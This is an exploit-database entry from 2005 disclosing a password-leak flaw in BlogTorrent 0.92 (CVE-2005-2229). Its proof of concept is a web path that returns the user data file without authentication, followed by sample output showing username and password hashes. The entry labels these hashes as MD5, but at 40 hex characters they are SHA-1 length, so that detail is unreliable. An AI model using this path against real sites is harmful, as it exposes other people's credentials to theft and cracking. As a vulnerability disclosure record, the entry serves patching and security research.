BlogTorrent 0.92 - Remote Password Disclosure
Author: LazyCrs
type: webapps
platform: php
port:
date_added: 2005-07-10
date_updated: 2016-05-25
verified: 1
codes: OSVDB-17832;CVE-2005-2229
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comBlogTorrent-preview-0.92.zip
# Edited for easy info. /str0ke
Software: BlogTorrent 0.92 <=
Vendor: http://www.blogtorrent.com/
Author: LazyCrs && pjphem
Date: 10/07/2005
Type: Remote/Local User Password Disclosure
#0x03 - POC
http://test/path_of_blog/data/newusers
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee
Username (crypt in md5) -> 14ae696abdca1688dd577fe486c3981f331457b0d7
Password (crypt in md5) -> d7b82821fe725305bded2fab9e91ed1e0e6fd93bee
#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!
# milw0rm.com [2005-07-11]